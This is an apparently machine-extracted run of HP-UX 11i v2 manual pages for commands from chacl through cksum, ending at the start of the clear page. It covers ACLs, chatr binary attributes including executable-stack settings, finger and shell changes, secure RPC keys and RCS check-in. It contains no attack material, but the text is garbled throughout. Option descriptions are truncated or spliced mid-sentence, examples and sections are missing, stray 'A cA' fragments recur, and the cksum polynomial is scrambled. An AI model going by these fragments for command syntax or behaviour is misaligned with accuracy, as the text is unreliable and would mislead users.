HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−71
chacl(1) chacl(1)
NAME
chacl - add, modify, delete, copy, or summarize access control lists (ACLs) of files
SYNOPSIS
/usr/bin/chacl acl file ...
chacl -r acl file ...
chacl -d aclpatt file ...
chacl -f fromfile tofile ...
chacl - [ z Z F ] file ...
DESCRIPTION
A cA chacl extends the capabilities of chmod(1), by enabling the user to grant or restrict file access to addi-
tional specific users and/or groups. Traditional file access permissions, set when a file is created, grant or
restrict access to the file’s owner, group, and other users. These file access permissions (eg., rwxrw-r--)
are mapped into three base access control list entries: one entry for the file’s owner (u.%, mode), one for
the file’s group (%.g, mode), and one for other users (%.%, mode).
chacl enables a user to designate up to thirteen additional sets of permissions (called optional access
control list (ACL) entries) which are stored in the access control list of the file.
To use chacl , the owner (or superuser) constructs an acl , a set of (user.group, mode) mappings to associ-
ate with one or more files. A specific user and group can be referred to by either name or number; any
user (u), group (g), or both can be referred to with a % symbol, representing any user or group. The @
symbol specifies the file’s owner or group.
Read, write, and execute/search (rwx) modes are identical to those used by chmod; symbolic operators
(op) add (+), remove (-), or set (=) access rights. The entire acl should be quoted if it contains whitespace
or special characters. Although two variants for constructing the acl are available (and fully explained in
acl (5)), the following syntax is suggested:
entry [, entry ] ...
where the syntax for an entry is
u.g op mode[ op mode ] ...
By default, chacl modifies existing ACLs. It adds ACL entries or modifies access rights in existing ACL
entries. If acl contains an ACL entry already associated with a file, the entry’s mode bits are changed to
the new value given, or are modified by the specified operators. If the file’s ACL does not already contain
the specified entry, that ACL entry is added. chacl can also remove all access to files. Giving it a null
acl argument means either ‘‘no access’’ (when using the -r option) or ‘‘no changes.’’
For a summary of the syntax, run chacl without arguments.
If file is specified as -, chacl reads from standard input.
Options
chacl recognizes the following options:
-r Replace old ACLs with the given ACL. All optional ACL entries are first deleted from the
specified files’s ACLs, their base permissions are set to zero, and the new ACL is applied.
If acl does not contain an entry for the owner (u.%), the group (%.g), or other (%.%)
users of a file, that base ACL entry’s mode is set to zero (no access). The command affects
all of the file’s ACL entries, but does not change the file’s owner or group ID.
In chmod(1), the ‘‘modify’’ and ‘‘replace’’ operations are distinguished by the syntax
(string or octal value). There is no corollary for ACLs because they have a variable
number of entries. Hence chacl modifies specific entries by default, and optionally
replaces all entries.
-d Delete the specified entries from the ACLs on all specified files. The aclpatt argument can
be an exact ACL or an ACL pattern (see acl (5)). chacl -d updates each file’s ACL only
if entries are deleted from it.
If you attempt to delete a base ACL entry from any file, the entry remains but its access
mode is set to zero (no access). If you attempt to delete a non-existent ACL entry from a
file (that is, if an ACL entry pattern matches no ACL entry), chacl informs you of the
Section 1−−72 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
chacl(1) chacl(1)
EXTERNAL INFLUENCES
Environment Variables
LANG determines the language in which messages are displayed.
If LANG is not specified or is set to the empty string, a default of "C" (see lang (5)) is used instead of
LANG. If any internationalization variable contains an invalid setting, chacl behaves as if all interna-
tionalization variables are set to "C". See environ (5).
RETURN VALUE
If chacl succeeds, it returns a value of zero.
If chacl encounters an error before it changes any file’s ACL, it prints an error message to standard
error and returns 1. Such errors include invalid invocation, invalid syntax of acl (aclpatt ), a given user
name or group name is unknown, or inability to get an ACL from fromfile with the -f option.
If chacl cannot execute the requested operation, it prints an error message to standard error, contin-
ues, and later returns 2. This includes cases when a file does not exist, a file’s ACL cannot be altered,
more ACL entries would result than are allowed, or an attempt is made to delete a non-existing ACL entry.
EXAMPLES
The following command adds read access for user jpc in any group, and removes write access for any
user in the files’s groups, for files x and y.
chacl "jpc.%+r, %.@-w" x y
This command replaces the ACL on the file open as standard input and on file test with one which only
allows the file owner read and write access.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−73
chacl(1) chacl(1)
WARNINGS
An ACL string cannot contain more than 16 unique entries, even though converting @ symbols to user or
group names and combining redundant entries might result in fewer than 16 entries for some files.
DEPENDENCIES
chacl will fail when the target file resides on a file system which does not support ACLs.
NFS
Only the -F option is supported on remote files.
AUTHOR
chacl was developed by HP.
SEE ALSO
chmod(1), getaccess(1), lsacl(1), getacl(2), setacl(2), acl(5), glossary(9).
Section 1−−74 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
chatr(1) chatr(1)
NAME
chatr - change program’s internal attributes
SYNOPSIS
Format 1: for files with a single text segment and a single data segment
chatr [-s] [-z] [-Z] [-l library ] [-B mode ] [+as mode ] [+b flag ] [+cd flag ] [+ci flag ]
[+dbg flag ] [+es flag ] [+gst flag ] [+gstsize size ] [+id flag ] [+k flag ] [+l library ]
[+md flag ] [+mergeseg flag ] [+mi flag ] [+o flag ] [+pd size ] [+pi size ] [+s flag ] [+z
flag ] [+I flag ] file ...
Options
-l library Indicate that the specified shared library is subject to run-time path lookup if directory
path lists are provided (see +s and +b).
-s Perform its operation silently.
-z Enable run-time dereferencing of null pointers to produce a SIGSEGV signal. (This is
the complement of the -Z option.)
-B mode Select run-time binding behavior mode of a program using shared libraries. You must
specify one of the binding modes immediate or deferred. See the HP-UX Linker
and Libraries User’s Guide for a description of binding modes.
-Z Disable run-time dereferencing of null pointers. (This is the complement of the -z
option.)
+as mode should have been built with the -N compiler option to
ensure that the text and data segments are contiguous.
+b flag. See the +s
option. You can use the +b option to enable the embedded path for filter libraries.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−75
chatr(1) chatr(1)
+c flag (Format 2 only.) Enable or disable the code bit for a specified segment. If this is enabled,
it is denoted by the c flag for the segment listing in the chatr output.
+cd flag Enable or disable the code bit for the file’s data segment(s). If this is enabled, it is
denoted by the c flag for the segment listing in the chatr output.
+ci flag Enable or disable the code bit for the file’s text segments(s). If this is enabled, it is
denoted by the c flag for the segment listing in the chatr output.
+dbg flag Enable or disable the ability to run a program, and, after it is running, attach to it with a
debugger and set breakpoints in its dependent shared libraries.
+dz flag (Format 2 only.) Enable or disable lazy swap allocation for dynamically allocated seg-
ments (such as the stack or heap).
A cA +es flag Control the ability of user code to execute from stack with the flag values, enable and
disable. See the Restricting Execute Permission on Stacks section below for additional
information related to security issues.
+gst flag Control whether the global symbol table hash mechanism is used to look up values of
symbol import/export entries. The two flag values, enable and disable, respectively
enable and disable use of the global symbol table hash mechanism. The default is dis-
able.
+gstsize size
Request a particular hash array size using the global symbol table hash mechanism. The
value can vary between 1 and MAXINT. The default value is 1103. Use this option with
+gst enable. This option works on files liked with the +gst option.
+id flag Controls the preference of physical memory for the data segment. This is only important
on ccNUMA (Cache Coherent Non-Uniform Memory Architecture) systems. The flag
value may be either enable or disable. When enabled, the data segment will use inter-
leaved memory. When disabled (the default), the data segment will use cell local
memory. This behavior will be inherited across a fork(), but not an exec().
For more information regarding ccNUMA, see pstat_getlocality(2).
+k flag Request kernel assisted branch prediction. The flags enable and disable turn this
request on and off, respectively.
+l library Indicate that the specified shared library is not subject to run-time path lookup if direc-
tory path lists are provided (see +s and +b).
+m flag (Format 2 only.) Enable or disable the modification bit for a specified segment. If this is
enabled, it is denoted by the m flag for the segment listing in the chatr output.
+md flag Enable or disable the modification bit for the file’s data segment(s). If this is enabled, it
is denoted by the m flag for the segment listing in the chatr output.
+mergeseg flag
Enable or disable the shared library segment merging features. When enabled, all data
segments of shared libraries loaded at program startup are merged into a single block.
Data segments for each dynamically loaded library will also be merged with the data seg-
ments of its dependent libraries. Merging of these segments increasesrun-time perfor-
mance by allowing the kernel to use larger size page table entries.
+mi flag Enable or disable the modification bit for the file’s text segment(s). If this is enabled, it is
denoted by the m flag for the segment listing in the chatr output.
+o flag Enable or disable the DF_ORIGIN flag to control use of $ORIGIN $ORIGIN. The loader then uses this path for all occurrences
of $ORIGIN in the dependent libraries.
If there are no occurrences of $ORIGIN, you should disable the DF_ORIGIN flag, to
avoid calculating the absolute path. By default, if $ORIGIN is not present, the
DF_ORIGIN flag is disabled.
Section 1−−76 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
chatr(1) chatr(1)
+p size (Format 2 only.) Set the page size for a specified segment.
+pd size Request a particular virtual memory page size that should.
+pi size Request a particular virtual memory page size that should be used for text (instructions).
See the +pd option for additional information.
+r flag Request static branch prediction when executing this program. The flags enable and
disable turn this request on and off, respectively. If this is enabled, it is denoted by
the r flag for the segment listing in the chatr output.
+s flag Control whether the directory path list specified with the LD_LIBRARY_PATH and
SHLIB_PATH environment variable can be used to locate shared libraries needed by the A cA
program. The two flag values, enable and disable, respectively enable and disable
use of the environment variable. If both +s and +b are used, their relative order on the
command line indicates which path list will be searched first. See the +b option.
+sa address (Format 2 only.) Specify a segment using an address for a set of attribute modifications.
+sall (Format 2 only.) Use all segments in the file for a set of attribute modifications.
+si index (Format 2 only.) Specify a segment using a segment index number for a set of attribute
modifications.
+z flag Enable or disable lazy swap on all data segments (using FORMAT 1) or on a specific seg-
ment (using 2). The flags enable and disable turn this request on or off respec-
tively. May not be used with non-data segments.
+I flag Enable or disable dynamic instrumentation by /opt/langtools/bin/caliper. If
enabled, the dynamic loader (see dld.so (5)) will automatically invoke caliper upon
program execution to collect profile information.
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−77
chatr(1) chatr(1)
An alternate method is setting the kernel tunable parameter, executable_stack, to set a system-
wide default for whether stacks are executable. Setting the executable_stack parameter to 1 (one)
with sam (see sam(1M)) tells the HP-UX kernel to allow programs to execute on the program stack(s).
Use this setting if compatibility with older releases is more important than security. Setting the
executable_stack parameter to 0 (zero), the recommended setting, is appropriate if security is more
important than compatibility. This setting significantly improves system security with minimal, if any,
negative effects on legitimate applications.
Combinations of these settings may be appropriate for many applications. For example, after setting
executable_stack res-
trictive system default while still letting these specific applications run correctly, set
A cA executable_stack to 0, and run chatr +es enable on the specific binaries that need to execute
code from their stack(s). These binaries can be easily identified when they are executed, because they
will print error messages referring to this manual page.
The possible settings for executable_stack are as follows:
executable_stack = 0
A setting of 0 causes stacks to be non-executable and is strongly preferred from a security per-
spective.
executable_stack = 1 (default)
A setting of 1 (the default value) causes all program stacks to be executable, and is safest from
a compatibility perspective but is the least secure setting for this parameter.
executable_stack = 2 combinations of chatr +es and
executable_stack when executing from the program’s stack. Running chatr +es disable relies
solely on the setting of the executable_stack kernel tunable parameter when deciding whether or
not to grant execute permission for stacks and is equivalent to not having run chatr +es on the binary.
chatr +es executable_stack Action
enable 1 program runs normally
disable or 1 program runs normally
chatr is not run
enable 0 program runs normally
disable or 0 program is killed
chatr is not run
enable 2 program runs normally
disable or 2 program runs normally
chatr is not run with warning displayed
RETURN VALUE
chatr returns zero on success. If the command line contents is syntactically incorrect, or one or more of
the specified files cannot be acted upon, chatr returns information about the files whose attributes
could not be modified. If no files are specified, chatr returns decimal 255.
Illegal options
If you use an illegal option, chatr returns the number of non-option words present after the first illegal
option. The following example returns 4:
chatr +b enable +xyz enable +mno enable +pqr enable file
Invalid arguments
If you use an invalid argument with a valid option and you do not specify a filename, chatr returns 0,
as in this example:
chatr +b <no argument>
Section 1−−78 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
chatr(1) chatr(1)
If you specify a file name (regardless of whether or not the file exists), chatr returns the number of files
specified. The following example returns 3:
chatr <no argument> file1 file2 file3
Invalid files
If the command cannot act on any of the files given, it returns the total number of files specified (if some
option is specified). Otherwise it returns the number of files upon which it could not act. If a2 does not
have read/write permission, the first of the following examples returns 4 and the second returns 1:
chatr +b enable a1 a2 a3 a4
chatr a1 a2 a3 a4
EXTERNAL INFLUENCES
Environment Variables A cA
The following internationalization variables affect the execution of chatr: diagnos-
tic messages written to standard error.
LC_NUMERIC Determines the locale category for numeric formatting.
NLSPATH Determines the location of message catalogues for the processing of LC_MESSAGES.
If any internationalization variable contains an invalid setting, chatr behaves as if all internationaliza-
tion variables are set to C. See environ (5).
In addition, the following environment variable affects chatr:
TMPDIR Specifies a directory for temporary files (see tmpnam (3S)).
EXAMPLES
Change a.out to demand-loaded
chatr -q a.out
Change binding mode of program file that uses shared libraries to immediate and nonfatal. Also enable
usage of SHLIB_PATH environment variable:
chatr -B immediate -B nonfatal +s enable a.out
Disallow run-time path lookup for the shared library /usr/lib/libc.sl that the shared library
libfoo.sl depends on:
chatr +l /usr/lib/libc.sl libfoo.sl
Given segment index number 5 from a previous run of chatr, change the page size to 4 kilobytes:
chatr +si 5 +p 4K average64
HP-UX 11i Version 2: August 2003 −5− Hewlett-Packard Company Section 1−−79
chatr(1) chatr(1)
WARNINGS
This release of the chatr command no longer supports the following options:
• -n
• -q
• -M
• -N
• +getbuckets size
• +plabel_cache flag
• +q3p flag
• +q4p flag
AUTHOR
chatr was developed by HP.
SEE ALSO
System Tools
ld(1) invoke the link editor
dld.so (5) dynamic loader
Miscellaneous
a.out (4) assembler, compiler, and linker output
magic (4) magic number for HP-UX implementations
sam(1M) system administration manager
Section 1−−80 Hewlett-Packard Company −6− HP-UX 11i Version 2: August 2003
checknr(1) checknr(1)
NAME
checknr - check nroff/troff files
SYNOPSIS
checknr [-s] [-f] [-a.x1 .y1.x2 .y2 ... .xn .yn ] [-c.x1 .x2 .x3 ...c .xn ] [ file ... ]
DESCRIPTION
checknr searches a list of nroff or troff input files for certain kinds of errors involving
mismatched opening and closing delimiters and unknown commands. If no files are specified, checknr
searches the standard input. checknr looks for the following:
• Font changes using \fx ... \fP.
• Size changes using \sx ... \s0.
• Macros that come in open ... close forms, such as the .TS and .TE macros, which must appear
A cA
in matched pairs.
checknr knows about the ms and me macro packages.
Options
checknr recognizes the following options:
-a Define additional macro pairs in the list. -a is followed by groups of six characters, each
group defining a pair of macros. Each six characters consist of a period, the first macro name,
another period, and the second macro name. For example, to define the pairs .BS and .ES,
and .XS and .XE, use:
-a.BS.ES.XS.XE
No spaces are allowed between the option and its arguments.
-c Define commands that checknr would otherwise interpret as undefined.
-f Ignore \fx font changes.
-s Ignore \sx size changes.
EXTERNAL INFLUENCES
International Code Set Support
Single-byte character code sets are supported.
DIAGNOSTICS
checknr complains about unmatched delimiters, unrecognized commands, and bad command syntax.
EXAMPLES
Check file sorting for errors that involve mismatched opening and closing delimiters and unknown
commands, but disregard errors caused by font changes:
checknr -f sorting
WARNINGS
checknr is designed for use on documents prepared with the intent of using checknr, much the same
as lint is used. It expects a certain document writing style for \f... and \s... commands, in which
each \fx is terminated with \fP and each \sx is terminated with \s0. Although text files format prop-
erly when the next font or point size is coded directly instead of using \fP or \s0, such techniques pro-
duce complaints from checknr . If files are to be examined by checknr , the \fP and \s0 delimiting con-
ventions should be used.
-a cannot be used to define single-character macro names.
checknr does not recognize certain reasonable constructs such as conditionals.
AUTHOR
checknr was developed by the University of California, Berkeley.
SEE ALSO
checkeq(1), lint(1), nroff(1).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−81
chfn(1) chfn(1)
NAME
chfn - change user information; used by finger
SYNOPSIS
chfn [login-name ]
chfn -r files [login-name ]
chfn -r nis [login-name ]
chfn -r nisplus [login-name ]
chfn -r dce [login-name ]
A cA DESCRIPTION
The chfn command changes the user information that is stored in the repository for the current
logged-in user or for the user specified by login-name (see passwd (1)).
The information is organized as four comma-separated subfields within the reserved (5th) field of the
password file entry. It consists of the user’s full name, location code, office phone number, and home
phone number, in that order. This information is used by the finger command and other programs (see
finger(1)).
chfn prompts you for each subfield. The prompt includes a default value, which is enclosed in brackets.
Accept the default value by pressing the Return key. To enter a blank subfield, type the word none.
The DCE repository (-r dce) is only available if Integrated Login has been configured, see
auth.adm (1M). If Integrated Login has been configured, other considerations apply. A user with
appropriate DCE privileges is capable of modifying a user’s finger (gecos) information; this is not depen-
dent upon superuser privileges.
If the repository is not specified; i.e., chfn [login-name ], the finger information is changed in the passwd
file only.
Run finger after running chfn to make sure the information was processed correctly.
Options
The following option is recognized:
-r Specify the repository to which the operation is to be applied. Supported reposi-
tories include files, nis, nisplus, and dce.
Subfield Values
Name Up to 1022 printing characters.
The finger command and other utilities expand an & found anywhere in this
subfield by substituting the login name for it and shifting the first letter of the
login name to uppercase. (chfn does not alter the input &.)
Location Up to 1022 printing characters.
Office Phone Up to 25 printing characters.
finger inserts appropriate hyphens if the value is all digits.
Home Phone Up to 25 printing characters.
finger inserts appropriate hyphens if the value is all digits.
Security Restrictions
You must have appropriate privileges to use the optional login-name argument to change another user’s
information.
EXAMPLES
The following is a sample run. The user’s input is shown in regular type.
Name [Tracy Simmons]:
Location (Ex: 47U-P5) []: 42L-P1
Office Phone (Ex: 1632) [77777]: 71863
Home Phone (Ex: 9875432) [4085551546]: none
Section 1−−82 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
chfn(1) chfn(1)
WARNINGS
The encoding of office and extension information is installation-dependent.
For historical reasons, the user’s name, etc., are stored in the /etc/passwd file. This is an inappropri-
ate place to store the information.
Because two users may try to write the passwd file at once, a synchronization method was developed.
On rare occasions, chfn prints a message that the password file is busy. When this occurs, chfn sleeps
for a short time, then tries to write to the passwd file again.
AUTHOR
chfn was developed by the University of California, Berkeley.
FILES
/etc/passwd A cA
/etc/ptmp
NOTES
The chfn command is a hard link to passwd command. When chfn is executed, actually the passwd
command gets executed with appropriate arguments to change the user gecos information in the reposi-
tory specified in command line. If no repository is specified the gecos information is changed in
/etc/passwd file.
SEE ALSO
chsh(1), finger(1), passwd(1), passwd(4).
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−83
chkey(1) chkey(1)
NAME
chkey - change user’s secure RPC key pair
SYNOPSIS
chkey [ -p ] [ -s nisplus | nis | files ]
DESCRIPTION
chkey is used to change a user’s secure RPC public key and secret key pair. chkey prompts for the old
secure-rpc password and verifies that it is correct by decrypting the secret key. If the user has not
already keylogged in,.
A cA chkey ensures that the login password and the secure-rpc password are kept the same.
The key pair can be stored in the /etc/publickey file, (see publickey (4)), NIS publickey map or
NIS+ cred.org_dir table. If a new secret key is generated, it will be registered with the local
keyserv (1M) daemon.. How-
ever, if multiple name services are listed, chkey can not decide which source to update and will display
an error message. The user should specify the source explicitly with the -s option.
Non root users are not allowed to change their key pair in the /etc/publickey file.
Options
-p Re-encrypt the existing secret key with the user’s login password.
-s nisplus Update the NIS+ database.
-s nis Update the NIS database.
-s files Update the files database.
AUTHOR
chkey was developed by Sun Microsystems, Inc.
FILES
/etc/nsswitch.conf
/etc/publickey
SEE ALSO
keylogin(1), keylogout(1), keyserv(1M), newkey(1M), nisaddcred(1M), nsswitch.conf(4), publickey(4).
Section 1−−84 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
chmod(1) chmod(1)
NAME
chmod - change file mode access permissions
SYNOPSIS
/usr/bin/chmod [-A] [-R] symbolic_mode_list file ...
Obsolescent form:
/usr/bin/chmod [-A] [-R] numeric_mode file ...
DESCRIPTION
The chmod command changes the permissions of one or more file s according to the value of
symbolic_mode_list or numeric_mode . You can display the current permissions for a file with the ls -l
command (see ls (1)).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−85
chmod(1) chmod(1)
Options
-A Preserve any optional access control list (ACL) entries associated with the file (HFS file sys-
tems).
RETURN VALUE
Upon completion, chmod returns one of the following values:
0 Successful completion.
>0 An error condition occurred.
EXAMPLES
Deny write permission to others:
chmod o-w file
Section 1−−86 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
chmod(1) chmod(1)
DEPENDENCIES
The -A option causes chmod to fail on file systems that do not support ACLs.
AUTHOR
chmod was developed by AT&T and HP.
SEE ALSO
chacl(1), ls(1), umask(1), chmod(2), acl(5), aclv(5).
STANDARDS CONFORMANCE
chmod: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−87
chown(1) chown(1)
NAME
chown, chgrp - change file owner or group
SYNOPSIS
chown [-h] [-R] owner[:group ] file ...
chgrp [-h] [-R] group file ...
DESCRIPTION
The chown command changes the owner ID of each specified file to owner and optionally the group ID of
each specified file to group .
The chgrp command changes the group ID of each specified file to group .
A cA owner can be either a decimal user ID or a login name found in the /etc/passwd file.
group can be either a decimal group ID or a group name found in the /etc/group file.
In order to change the owner or group, you must own the file and have the CHOWN privilege (see
setprivgrp (1M)). If either command is invoked on a regular file by other than the superuser, the set-
user-ID and set-group-ID bits of the file mode (04000 and 02000 respectively) are cleared. Note that a
given user’s or group’s ability to use this command can be restricted by setprivgrp (see
setprivgrp (1M)).
Access Control Lists − HFS File Systems Only
Users can permit or deny specific individuals and groups to access a file by setting optional ACL entries
in the file’s access control list (see acl (5)). When using chown in conjunction with HFS ACLs, if the new
owner and/or group of a file does not have an optional ACL entry corresponding to user .% and/or
%.group in the file’s access control list, the file’s access permission bits remain unchanged. However, if
the new owner and/or group is already designated by an optional ACL entry of user .% and/or %.group in
the file’s ACL, chown sets the corresponding file access permission bits (and the corresponding base ACL
entries) to the permissions contained in that entry.
Options
chown and chgrp recognize the following options:
-h Change the owner or group of a symbolic link.
By default, the owner or group of the target file that a symbolic link points to is changed. With
-h, the target file that the symbolic link points to is not affected. If the target file is a direc-
tory, and you specify -h and -R, recursion does not take place.
-R Recursively change the owner or group. For each file operand that names a directory, the
owner or group of the directory and all files and subdirectories in the file hierarchy below it
are changed., chown behaves as if all internationaliza-
tion variables are set to "C". See environ (5).
Section 1−−88 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
chown(1) chown(1)
RETURN VALUE
chown and chgrp return the following values:
0 Successful completion.
>0 An error condition occurred.
EXAMPLES
The following command changes the owner of the file jokes to sandi:
chown sandi jokes
The following command searches the directory design_notes and changes each file in that directory to
owner mark and group users:
chown -R mark:users design_notes
WARNINGS
A cA
The default operation of chown and chgrp for symbolic links has changed as of HP-UX release 10.0.
Use the -h option to get the former default operation.
FILES
/etc/group
/etc/passwd
SEE ALSO
chmod(1), setprivgrp(1M), chown(2), group(4), passwd(4), acl(5), aclv(5).
STANDARDS CONFORMANCE
chown: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
chgrp: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−89
chsh(1) chsh(1)
NAME
chsh - change default login shell
SYNOPSIS
chsh login-name [shell ]
chsh -r files login-name [shell ]
chsh -r nisplus login-name [shell ]
chsh -r nis login-name [shell ]
chsh -r dce login-name [shell ]
A cA DESCRIPTION
The chsh command changes the login-shell for a user’s login name in the repository (see passwd (1)).
The DCE repository (-r dce) is only available if Integrated Login has been configured, see
auth.adm (1M). If Integrated Login has been configured, other considerations apply. A user with
appropriate DCE privileges is capable of modifying a user’s shell; this is not dependent upon superuser
privileges.
If the repository is not specified; i.e., chsh [login-name ], the login shell is changed in passwd file only.
Run finger after running chsh to make sure the information was processed correctly.
Arguments
login-name A login name of a user.
shell The absolute path name of a shell. If the file /etc/shells exists, the new login shell
must be listed in that file. Otherwise, you can specify one of the standard shells listed
in the getusershell (3C) manual entry. If shell is omitted, it defaults to the POSIX shell,
/usr/bin/sh.
Options
The following option is recognized:
-r Specify the repository to which the operation is to be applied. Supported reposi-
tories include files, nis, nisplus, and dce.
Security Restrictions
You must have appropriate privileges to use the optional login-name argument to change another user’s
login shell.
NETWORKING FEATURES
NFS
File /etc/passwd can be implemented as a Network Information Service (NIS) database.
EXAMPLES
To change the login shell for user voltaire to the default:
chsh voltaire
To change the login shell for user descartes to the C shell:
chsh descartes /usr/bin/csh
To change the login shell for user aristotle to the Korn shell in the DCE registry:
chsh -r dce aristotle /usr/bin/ksh
WARNINGS
As many users may try to write the /etc/passwd file simultaneously, a passwd locking mechanism was
deviced. If this locking fails after subsequent retrying, chsh terminates.
AUTHOR
chsh was developed by HP and the University of California, Berkeley.
Section 1−−90 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
chsh(1) chsh(1)
NOTES
The chsh command is a hard link to passwd command. When chsh is executed actually the passwd
command gets executed with appropriate arguments to change the user login shell in the repository
specified in command line. If no repository is specified the login shell is changed in /etc/passwd file.
FILES
/etc/shells
/etc/ptmp
SEE ALSO
chfn(1), csh(1), ksh(1), passwd(1), sh(1), sh-posix(1), getusershell(3C), pam(3), passwd(4), shells(4).
A cA
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−91
ci(1) ci(1)
NAME
ci - check in RCS revisions
SYNOPSIS
ci [ options ] file ...
DESCRIPTION
ci stores new revisions into RCS files. Each file name ending in ,v is treated as an RCS file; all others
are assumed to be working files. ci deposits the contents of each working file into the corresponding
RCS file (see rcsintro (5)).
If the RCS file does not exist, ci creates it and deposits the contents of the working file as the initial
revision. The default number is "1.1". The access list is initialized to empty. Instead of the log message,
A cA ci requests descriptive text (see the -t option below).
An RCS file created by ci inherits the read and execute permissions from the working file. If the RCS
file exists, ci preserves its read and execute permissions. ci always turns off all write permissions of
RCS files.
The caller of the command must have read/write permission for the directories containing the RCS file
and the working file, and read permission for the RCS file itself. A number of temporary files are created.
A semaphore file is created in the directory containing the RCS file. ci always creates a new RCS file
and unlinks the old one; therefore links to RCS files are useless.
For ci to work, the user’s login must be in the access list unless the access list is empty, the user is the
owner of the file, or the user is super-user.
Normally, ci checks whether the revision to be deposited is different from the preceding one. If it is not
different, ci either aborts the deposit (if -q is given) or asks whether to abort (if -q is omitted). A
deposit can be forced with the -f option.
If sufficient memory is not available for checking the difference between the revision to be deposited and
the preceding one, then either swap or maxdsiz values can be increased.
For each revision deposited, ci prompts for a log message. The log message should summarize the
change and must be terminated with a line containing a single "." or a control-D. If several files are being
checked in, ci asks whether or not to reuse the log message from the previous file. If the standard input
is not a terminal, ci suppresses the prompt and uses the same log message for all files (see -m option
below.
The number of the deposited revision can be given with any of the options -r, -f, -k, -l, -u, or -q (see
-r option below).
To add a new revision to an existing branch, the head revision on that branch must be locked by the
caller. Otherwise, only a new branch can be created. This restriction is not enforced for the owner of the
file, unless locking is set to strict (see rcs (1)). A lock held by someone else can be broken with the
rcs command (see rcs (1)).
Options
-f[ rev ] Forces a deposit. The new revision is deposited even if it is not different from the preced-
ing one.
-k[ rev ] -k option at these
sites to preserve its original number, date, author, and state.
-l[ rev ] Works like -r, except it performs an additional co -l for the deposited revision. Thus,
the deposited revision is immediately checked out again and locked. This is useful for
saving a revision although one wants to continue editing it after the check-in.
-m"msg" Uses the string msg as the log message for all revisions checked in.
-n"name" Assigns the symbolic name name to the checked-in revision. ci prints an error message
if name is already assigned to another number.
Section 1−−92 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
ci(1) ci(1)
DIAGNOSTICS
For each revision, ci prints the RCS file, the working file, and the number of both the deposited and the
preceding revision. The exit status always refers to the last file checked in, and is 0 if the operation was
successful, 1 if unsuccessful.
EXAMPLES
If the current directory contains a subdirectory RCS with an RCS file io.c,v, all of the following com-
mands deposit the latest revision from io.c into RCS/io.c,v:
ci io.c
ci RCS/io.c,v
ci io.c,v
ci io.c RCS/io.c,v
ci io.c io.c,v
ci RCS/io.c,v io.c
ci io.c,v io.c
Check in version 1.2 of RCS file foo.c,v, with the message Bug fix:
ci -r1.2 -m"Bug Fix" foo.c,v
WARNINGS
The names of RCS files are generated by appending ,v to the end of the working file name. If the result-
ing RCS file name is too long for the file system on which the RCS file should reside, ci terminates with
an error message.
The log message cannot exceed 2046 bytes.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−93
ci(1) ci(1)
A file with approximately 240 revisions may cause a hash table overflow. ci cannot add another revi-
sion to the file until some of the old revisions have been removed. Use the rcs -o (obsolete) command
option to remove old revisions.
RCS is designed to be used with TEXT files only. Attempting to use RCS with non-text (binary) files
results in data corruption.
AUTHOR
ci was developed by Walter F. Tichy.
SEE ALSO
co(1), ident(1), rcs(1), rcsdiff(1), rcsmerge(1), rlog(1), rcsfile(4), acl(5), rcsintro(5).
A cA
Section 1−−94 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
ckconfig(1) ckconfig(1)
NAME
ckconfig - verify the path names of all the FTP configuration files.
SYNOPSIS
/usr/bin/ckconfig [-V]
DESCRIPTION
The ckconfig utility is used to verify the path names of the FTP configuration files,
/etc/ftpd/ftpusers, /etc/ftpd/ftpaccess, /etc/ftpd/ftpconversions,
/etc/ftpd/ftpgroups, /etc/ftpd/ftphosts, /var/adm/syslog/xferlog, and
/etc/ftpd/pids/*.
This utility checks to see that all the FTP configuration files are in the path specified. If it is not able to
find the configuration files in the path, it will give out an error message to the system administrator about
the same.
A cA
The -V option causes the program to display copyright and version information, then terminate.
FILES
/usr/bin/ckconfig
AUTHOR
ckconfig was developed by the Washington University, St. Louis, Missouri.
SEE ALSO
ftpusers(4), ftpconversions(4), ftpaccess(4), ftphosts(4), ftpgroups(4), xferlog(5).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−95
cksum(1) cksum(1)
NAME
cksum - print file checksum and sizes
SYNOPSIS
cksum [file ...]
DESCRIPTION file.
A cA x
32
+x
26
+x
23
+x
22
+x
16
+x
12
+x
11
+x
10 7 5 4 2
+x +x +x +x +x +x
1 0
The results of the calculation are truncated to a 32-bit value. The number of bytes in the file is also
printed.
Standard input is used if no file names are given.
cksum is typically used to verify data integrity when copying files between systems._MESSAGES determines the language in which messages are displayed.
If any internationalization variable contains an invalid setting, cksum behaves as if all internationaliza-
tion variables are set to "C". See environ (5).
RETURN VALUE
Upon completion, cksum returns one of the following values:
0 All files were processed successfully.
>0 One or more files could not be read or another error occurred.
If an inaccessible file is encountered, cksum continues processing any remaining files, but the final exit
status is affected.
SEE ALSO
sum(1), wc(1).
STANDARDS CONFORMANCE
cksum: XPG4, POSIX.2
Section 1−−96 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
clear(1) clear(1)
NAME
clear - clear terminal screen
SYNOPSIS
clear
